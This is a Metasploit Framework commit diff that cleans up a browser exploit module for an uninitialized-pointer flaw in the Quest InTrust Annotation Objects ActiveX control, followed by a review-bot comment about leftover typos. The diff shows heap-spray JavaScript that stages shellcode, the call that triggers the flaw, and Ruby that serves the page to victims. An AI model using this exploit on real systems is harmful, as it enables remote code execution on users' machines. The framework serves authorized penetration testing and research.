Module rename. Cleanup whitespace. Fix typos.

unstable
sinn3r 2012-04-12 01:30:01 -05:00
parent 14f85e406f
commit 0d739a1a51
1 changed files with 54 additions and 55 deletions


@ -1,7 +1,3 @@
##
# $Id$
##
###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super( update_info(info,
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
'Description' => %q{
This module exploits a uninitialized variable vulnerability in the
This module exploits an uninitialized variable vulnerability in the
Annotation Objects ActiveX component. The activeX component loads into memory without
opting into ALSR so this module exploits the vulnerability against windows Vista and
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX
points to part of the rop chain in a heap chunk and the calculated call will hit the
pivot in a seperate heap chunk. This will take some time in the users browser.
Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
points to part of the ROP chain in a heap chunk and the calculated call will hit the
pivot in a separate heap chunk. This will take some time in the users browser.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # initial discovery & poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
'mr_me <steventhomasseeley[at]gmail.com>' # msf module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '80662'],
[ 'BID', '52765'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
memory = new Array();
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
var data = payload;
while(data.length < 100000) { data += data; }
var onemeg = data.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += data.substr(0, 64*1024/2);
}
onemeg += data.substr(0, (64*1024/2)-(38/2));
var block = new Array();
for (i=0; i<700; i++) {
block[i] = onemeg.substr(0, onemeg.length);
}
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
</html>
EOF
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
print_status("#{peer} Sending HTML...")
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
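Review bot: The 'Description' text in the second hunk still spells the mitigation as "ALSR" on the unchanged line between the corrected ones, although this commit is a typo pass. The same paragraph keeps "activeX", "windows Vista" and "users browser". Suggested wording: `Annotation Objects ActiveX component. The ActiveX component loads into memory without`, `opting into ASLR so this module exploits the vulnerability against Windows Vista and`, and `pivot in a separate heap chunk. This will take some time in the user's browser.` The acronym matters most, because anyone searching module descriptions for ASLR will miss this entry. The `initialize` method continues past the end of that hunk, so the rest of the metadata was not reviewed.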